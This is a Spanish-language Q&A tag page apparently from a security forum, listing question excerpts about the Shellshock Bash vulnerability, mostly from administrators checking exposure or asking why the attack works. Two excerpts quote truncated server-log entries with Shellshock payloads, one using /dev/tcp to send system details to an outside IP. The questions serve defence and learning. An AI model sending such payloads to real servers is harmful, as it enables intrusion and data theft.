Preguntas con etiqueta 'shellshock'

2
respuestas

¿Hay sitios remotos disponibles para aplicar shellshock?

Soy un estudiante graduado. Estamos buscando un sitio remoto para realizar shellshock con fines educativos. ¿Sitios que son voluntariamente vulnerables por motivos de piratería ética?     
hecha 09.01.2016 - 05:47
1
respuesta

¿Cómo saber si el sitio de otra persona es vulnerable a Shellshock sin hackearlo?

Con la tarjeta de registro en la mano, ayer fui a registrar una herramienta eléctrica recién comprada. Pero cuando llegué al sitio del fabricante, me recibió una antigua interfaz propia que tenía la marca "Copyright (C) 2004" y se parecía a HTML...
hecha 01.10.2014 - 20:40
1
respuesta

Shellshock y PHP fastcgi

Entiendo que ejecutar apache / mod_php es seguro, pero no he escuchado sobre el caso de ejecutar php en modo fastcgi (a través de nginx / php5-fpm), entonces, ¿alguien puede confirmar que esto también es seguro?     
hecha 07.10.2014 - 05:37
2
respuestas

Estoy "Shell Shocked" (secuencia de comandos remota descargada y ejecutada). ¿Puedo prohibir las descargas de archivos como medida de seguridad?

Hace unos días, alguien probó una serie de solicitudes en nuestra instancia de nginx. Todos fallaron excepto uno. 54.164.156.8 - - [**/Mar/2015:**********] "GET / HTTP/1.1" 200 393 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/p...
hecha 18.03.2015 - 18:09
2
respuestas

Envoltorios de script Set-uid, 'system (3)' shellshock y función de Bash importados del entorno

Dado , es un requisito frecuente permitir a los usuarios sin privilegios acceso restringido a funciones privilegiadas: los administradores de sistemas de trabajo a veces proporcionan esto en forma de shellscripts, que luego se invocan a través...
hecha 03.10.2014 - 15:01
2
respuestas

¿Se extenderá la vulnerabilidad de shell a los equipos de red de Cisco?

Como Cisco usa bash (y las interfaces web si no lo ha deshabilitado), ¿es susceptible a la vulnerabilidad de shell shocks?     
hecha 25.09.2014 - 17:39
1
respuesta

Bash Shellshock

Estoy intentando averiguar si mis dispositivos son vulnerables a bash shellshock. He ejecutado los comandos que se encuentran en enlace . Parece que mis dispositivos son susceptibles a una sola de las vulnerabilidades: Exploit 7 CVE-2014-6277,...
hecha 17.03.2015 - 13:35
1
respuesta

Línea de registro de Apache extraño [duplicado]

Acabo de encontrar esta entrada en uno de mis servidores: 213.165.70.245 - - [17/Jun/2015:01:58:22 +0200] "GET / HTTP/1.1" 404 442 "() { :;}; /bin/bash -c \"echo 109.234.106.8/ > /dev/tcp/74.208.79.34/21; /bin/uname -a > /dev/tcp/74.2...
hecha 17.06.2015 - 07:56
2
respuestas

muchos ataques csh http shellshock

Administro un servidor público que recibe aproximadamente una descarga de shell HTTP de 100 csh por día desde diferentes fuentes. Es un método HTTP GET que solicita el URI /cgi-bin/authLogin.cgi. Sabiendo que el URI solicitado no existe en mi...
hecha 31.12.2014 - 10:15
1
respuesta

¿Por qué Shellshock funciona en una cadena de usuario?

Me preguntaba por qué funciona Shellshock cuando se coloca en el agente de usuario. Según lo que pude encontrar, es porque un servidor web (por ejemplo, Apache) utiliza la cadena de usuario en su funcionamiento interno. ¿Por qué a un serv...
hecha 17.11.2014 - 13:49